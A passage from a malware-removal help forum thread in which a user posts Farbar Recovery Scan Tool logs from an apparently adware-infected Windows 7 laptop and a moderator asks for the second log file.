    2016-09-12 21:48 - 2016-06-25 15:53 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.exe
    2016-09-12 21:48 - 2016-06-25 15:53 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnpinst.exe
    2016-09-12 21:48 - 2016-06-25 15:41 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.exe
    2016-09-12 21:48 - 2016-06-22 09:06 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
    2016-09-12 19:48 - 2016-09-17 07:41 - 00000000 ____D C:\aa Canon 600D - T3i Master accum
    2016-09-12 19:47 - 2016-09-12 19:47 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-19 14:32 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2016-09-19 14:32 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2016-09-19 06:54 - 2009-07-14 01:13 - 00790438 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-09-19 06:54 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\inf
    2016-09-19 06:50 - 2009-07-14 01:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-09-19 03:11 - 2016-06-22 14:58 - 00000000 ____D C:\Users\SUPERDelete
    2016-09-19 03:08 - 2009-07-13 22:34 - 00000215 _____ C:\WINDOWS\system.ini
    2016-09-19 03:02 - 2016-01-29 17:35 - 00774756 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
    2016-09-18 20:43 - 2016-06-22 14:51 - 00001066 _____ C:\Users\Public\Desktop\VLC media player.lnk
    2016-09-18 20:43 - 2016-01-29 19:03 - 00002189 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002451 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002415 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002410 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002409 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002373 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002372 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002366 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002360 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002352 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
    2016-09-18 20:43 - 2016-01-21 19:43 - 00001015 _____ C:\Users\Administrator\Desktop\Virtual Moon Atlas.lnk
    2016-09-18 20:43 - 2016-01-21 15:55 - 00001852 _____ C:\Users\Public\Desktop\SUPERAntiSpyware Free Edition.lnk
    2016-09-18 20:43 - 2016-01-21 15:52 - 00001764 _____ C:\Users\Public\Desktop\Stellarium v14.2.lnk
    2016-09-18 20:43 - 2014-11-27 18:51 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
    2016-09-18 20:43 - 2014-11-27 18:51 - 00001314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
    2016-09-18 20:43 - 2009-07-14 01:01 - 00001282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001340 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001318 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
    2016-09-18 20:43 - 2009-07-14 00:54 - 00001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
    2016-09-18 20:43 - 2009-07-14 00:49 - 00001266 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
    2016-09-18 20:40 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\ModemLogs
    2016-09-18 10:24 - 2016-01-21 17:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\ElevatedDiagnostics
    2016-09-18 10:24 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-09-18 07:44 - 2016-06-22 14:52 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\vlc
    2016-09-17 15:57 - 2016-01-21 15:50 - 00000000 ____D C:\Frank
    2016-09-17 15:11 - 2016-06-20 18:06 - 00000000 ____D C:\0000 decripted
    2016-09-16 21:45 - 2016-01-29 18:52 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2016-09-16 21:44 - 2016-01-29 18:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2016-09-16 21:25 - 2016-06-22 14:51 - 00000000 ____D C:\Users\Administrator\AppData\Local\Chromium
    2016-09-16 21:25 - 2009-07-13 23:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
    2016-09-16 21:14 - 2009-07-14 00:45 - 00438496 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2016-09-16 19:51 - 2016-06-22 15:50 - 00000138 _____ C:\Users\Administrator\AppData\Roaming\WB.CFG
    2016-09-16 10:53 - 2016-01-21 18:08 - 00111536 _____ C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
    2016-09-14 04:29 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\rescache
    2016-09-13 17:22 - 2016-01-29 20:30 - 00000000 ____D C:\WINDOWS\system32\appraiser
    2016-09-13 17:22 - 2016-01-21 15:55 - 00000000 ____D C:\Program Files\SUPERAntiSpyware

    ==================== Files in the root of some directories =======

    2016-09-18 08:03 - 2016-09-18 08:04 - 7090176 _____ () C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 0140288 _____ () C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0018432 _____ () C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-06-22 15:50 - 2016-09-16 19:51 - 0000138 _____ () C:\Users\Administrator\AppData\Roaming\WB.CFG

    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-09-13 17:53

    ==================== End of FRST.txt ============================
     
  17. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    I still need second log.
     
  18. photiost

    photiost Established Techie7 Member

    If you mean the second log from the Farbar, no ``addition.txt`` was created on this last run ...
     
  19. photiost

    photiost Established Techie7 Member

    let me run that again ... with the addition checked ...
     
  20. photiost

    photiost Established Techie7 Member

    ok here is a fresh copy of both logs:

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-09-2016
    Ran by Administrator (administrator) on DELL35X8BT1 (19-09-2016 21:56:05)
    Running from C:\Users\Administrator\Downloads
    Loaded Profiles: Administrator (Available Profiles: Administrator)
    Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: FF)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
    (Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    (O2Micro International) C:\Windows\System32\drivers\o2flash.exe
    (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
    (Intel Corporation) C:\Windows\System32\igfxtray.exe
    (Intel Corporation) C:\Windows\System32\hkcmd.exe
    (Intel Corporation) C:\Windows\System32\igfxpers.exe
    (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
    (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
    (Global surveys) C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [626552 2012-06-18] (Alps Electric Co., Ltd.)
    HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [525312 2011-02-15] (IDT, Inc.)
    Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-09-12] (SUPERAntiSpyware)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Chromium] => c:\users\administrator\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Interstatnogui] => C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe [4110848 2016-09-18] (Global surveys)
    ShellIconOverlayIdentifiers: [KzShlobj2] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F3} => C:\Program Files (x86)\KuaiZip\X64\KZipShell.dll [2016-09-18] ()
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}: [DhcpNameServer] 10.254.240.200 10.254.240.201

    Internet Explorer:
    ==================
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.cloudynights.com/page/index.html
    SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO: Icatti -> {7B6678FD-F9E3-46FD-aCF0-4C011573F737} -> C:\Program Files\Icatti\Orosbusf64.dll => No File
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)

    FireFox:
    ========
    FF ProfilePath: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default
    FF DefaultSearchEngine: Search Module
    FF SelectedSearchEngine: Search Module
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
    FF Extension: (Firefox Hotfix) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-19]
    FF Extension: (Video DownloadHelper) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-09-16]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2980032 2016-09-05] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 atmeltpm; C:\Windows\system32\drivers\atmeltpm64.sys [19456 2012-05-25] (Atmel, Inc.)
    S3 BCMTPM; C:\Windows\system32\drivers\btpmwx64.sys [32096 2012-05-25] (Broadcom Corp.)
    S3 d554gps; C:\Windows\system32\drivers\d554gps64.sys [102440 2012-06-18] (Ericsson AB)
    S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
    S3 ecnssndis; C:\Windows\System32\Drivers\wwuss64.sys [26664 2012-06-18] (Ericsson AB)
    S3 ecnssndisfltr; C:\Windows\System32\Drivers\wwussf64.sys [29736 2012-06-18] (Ericsson AB)
    S3 Mbm3CBus; C:\Windows\system32\drivers\Mbm3CBus.sys [419400 2012-06-18] (MCCI Corporation)
    S3 Mbm3DevMt; C:\Windows\system32\drivers\Mbm3DevMt.sys [430664 2012-06-18] (MCCI Corporation)
    S3 nwdelgobi3kfilter; C:\Windows\system32\drivers\nwdelgobi3kfilter.sys [34304 2012-11-06] (Novatel Wireless Inc)
    S3 NWDellPort; C:\Windows\system32\drivers\nwdelser.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 NWDellPort2; C:\Windows\system32\drivers\nwdelser2.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 nwdelserial; C:\Windows\system32\drivers\nwdelserial.sys [234112 2012-11-06] (Novatel Wireless Inc.)
    S3 qcfilterdl2k; C:\Windows\system32\drivers\qcfilterdl2k.sys [6400 2012-07-05] (QUALCOMM Incorporated)
    S3 qcombusdl; C:\Windows\system32\drivers\qcombusdl.sys [137800 2012-07-05] (MCCI)
    S3 qcusbserdl2k; C:\Windows\system32\drivers\qcusbserdl2k.sys [230784 2012-07-05] (QUALCOMM Incorporated)
    R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    S3 stmtpm; C:\Windows\system32\drivers\stm_tpm.sys [29184 2012-05-25] (STMicroelectronics, INC)
    R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-11-06] (STMicroelectronics)
    S3 tcm; C:\Windows\system32\drivers\tcm.sys [17048 2012-07-04] ()
    U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2016-09-18] ()
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    NETSVCx32: HpSvc -> no filepath.

    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-19 03:11 - 2016-09-19 03:11 - 00036789 _____ C:\ComboFix.txt
    2016-09-19 03:08 - 2016-09-19 03:08 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashRpt
    2016-09-18 22:20 - 2016-09-19 03:12 - 00000000 ____D C:\ComboFix
    2016-09-18 22:20 - 2016-09-18 21:38 - 05658813 ____R (Swearware) C:\Users\Administrator\Desktop\ComboFix.exe
    2016-09-18 21:39 - 2016-09-19 03:11 - 00000000 ____D C:\Qoobox
    2016-09-18 21:39 - 2011-06-26 02:45 - 00256000 _____ C:\WINDOWS\PEV.exe
    2016-09-18 21:39 - 2010-11-07 13:20 - 00208896 _____ C:\WINDOWS\MBR.exe
    2016-09-18 21:39 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00098816 _____ C:\WINDOWS\sed.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00080412 _____ C:\WINDOWS\grep.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00068096 _____ C:\WINDOWS\zip.exe
    2016-09-18 21:38 - 2016-09-19 03:10 - 00000000 ____D C:\WINDOWS\erdnt
    2016-09-18 21:38 - 2016-09-18 21:38 - 05658813 ____R (Swearware) C:\Users\Administrator\Downloads\ComboFix.exe
    2016-09-18 21:09 - 2016-09-18 21:09 - 00006874 _____ C:\Users\Administrator\Desktop\JRT.txt
    2016-09-18 21:07 - 2016-09-18 21:07 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\KuaiZip
    2016-09-18 20:56 - 2016-09-18 21:02 - 00000000 ____D C:\AdwCleaner
    2016-09-18 20:51 - 2016-09-18 20:51 - 00165985 _____ C:\malware scan log1.txt
    2016-09-18 20:38 - 2016-09-18 20:38 - 00006960 _____ C:\mwbits.txt
    2016-09-18 20:15 - 2016-09-18 20:58 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashDumps
    2016-09-18 20:09 - 2016-09-19 20:55 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-09-18 20:09 - 2016-09-18 21:00 - 00000000 ____D C:\Program Files (x86)\KuaiZip
    2016-09-18 20:09 - 2016-09-18 20:43 - 00001102 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
    2016-09-18 20:09 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-09-18 20:09 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-09-18 20:09 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-09-18 20:05 - 2016-09-18 20:05 - 00144744 _____ C:\Users\Administrator\Documents\RKreport E446.tmp.txt
    2016-09-18 19:22 - 2016-09-18 19:22 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
    2016-09-18 19:21 - 2016-09-18 20:43 - 00000902 _____ C:\Users\Public\Desktop\RogueKiller.lnk
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\ProgramData\RogueKiller
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\Program Files\RogueKiller
    2016-09-18 19:02 - 2016-09-18 19:03 - 01610560 _____ (Malwarebytes) C:\Users\Administrator\Downloads\JRT.exe
    2016-09-18 19:02 - 2016-09-18 19:02 - 03861056 _____ C:\Users\Administrator\Downloads\adwcleaner_6.020.exe
    2016-09-18 19:01 - 2016-09-18 19:02 - 22851472 _____ (Malwarebytes ) C:\Users\Administrator\Downloads\mbam-setup-2.2.1.1043.exe
    2016-09-18 18:59 - 2016-09-18 19:00 - 33565440 _____ (Adlice Software ) C:\Users\Administrator\Downloads\setup.exe
    2016-09-18 11:58 - 2016-09-19 21:48 - 00020345 _____ C:\Users\Administrator\Downloads\Addition.txt
    2016-09-18 11:57 - 2016-09-19 21:56 - 00011448 _____ C:\Users\Administrator\Downloads\FRST.txt
    2016-09-18 11:57 - 2016-09-19 21:56 - 00000000 ____D C:\FRST
    2016-09-18 11:57 - 2016-09-18 11:57 - 02399232 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64.exe
    2016-09-18 11:05 - 2016-09-18 11:09 - 00172700 _____ C:\WINDOWS\ntbtlog.txt
    2016-09-18 10:49 - 2016-09-18 10:50 - 49521912 _____ (www.ludashi.com) C:\Users\Administrator\Downloads\ludashisetup.exe
    2016-09-18 10:48 - 2016-09-18 20:43 - 00001153 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 20:43 - 00001147 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2016-09-18 09:15 - 2016-09-18 09:15 - 00003110 _____ C:\WINDOWS\System32\Tasks\{AC769F71-F24C-4982-9CD9-2399739747D0}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00003120 _____ C:\WINDOWS\System32\Tasks\{9CBDDEFC-08B0-4505-B272-4C0259D93CAD}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00000000 ____D C:\WINDOWS\system32\appmgmt
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003586 _____ C:\WINDOWS\System32\Tasks\{C7D820FC-CDAB-40D6-BEDE-D25C4C86FE7F}
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003106 _____ C:\WINDOWS\System32\Tasks\{5E89D5D4-C91B-4F37-AF11-F0CBE417CCC0}
    2016-09-18 09:06 - 2016-09-18 09:06 - 00003594 _____ C:\WINDOWS\System32\Tasks\{E2E7A15A-991B-470C-85A5-CFECBCB02080}
    2016-09-18 08:49 - 2016-09-18 08:49 - 00000000 ____D C:\WINDOWS\system32\guu
    2016-09-18 08:05 - 2016-09-18 09:57 - 00000000 ____D C:\Program Files (x86)\LuDaShib
    2016-09-18 08:05 - 2016-09-18 08:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\鲁大师
